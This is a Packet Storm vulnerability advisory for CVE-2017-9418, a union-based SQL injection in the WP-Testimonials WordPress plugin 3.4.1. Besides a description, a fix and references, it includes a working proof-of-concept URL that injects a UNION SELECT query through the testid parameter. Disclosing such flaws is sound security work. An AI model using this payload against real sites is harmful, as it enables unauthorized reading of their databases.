Lucene search

K
packetstormDimitrios TsagkarakisPACKETSTORM:142912
HistoryJun 03, 2017 - 12:00 a.m.

WordPress WP-Testimonials SQL Injection

2017-06-0300:00:00
Dimitrios Tsagkarakis
packetstormsecurity.com
28

EPSS

0.001

Percentile

46.8%

`# Exploit Title: WP-Testimonials < 3.4.1 Union Based SQL Injection  
# Date: 03-06-2017  
# Exploit Author: Dimitrios Tsagkarakis  
# Website: dtsa.eu   
# Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/  
# Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/  
# Version: 3.4.1  
# CVE : CVE-2017-9418  
  
# Category: webapps  
  
  
  
1. Description:  
  
  
  
SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for  
WordPress allows an authenticated user to execute arbitrary SQL commands via  
the testid parameter to wp-admin/admin.php.  
  
2. Proof of Concept:  
  
http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedi  
t&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL--  
comment  
  
3. Solution:  
  
  
  
The plugin has been removed from WordPress. Deactivate the plug-in and wait  
for a hotfix.  
  
  
  
4. Reference:  
  
http://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-inje  
ction-sqli/  
  
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9418  
  
`

EPSS

0.001

Percentile

46.8%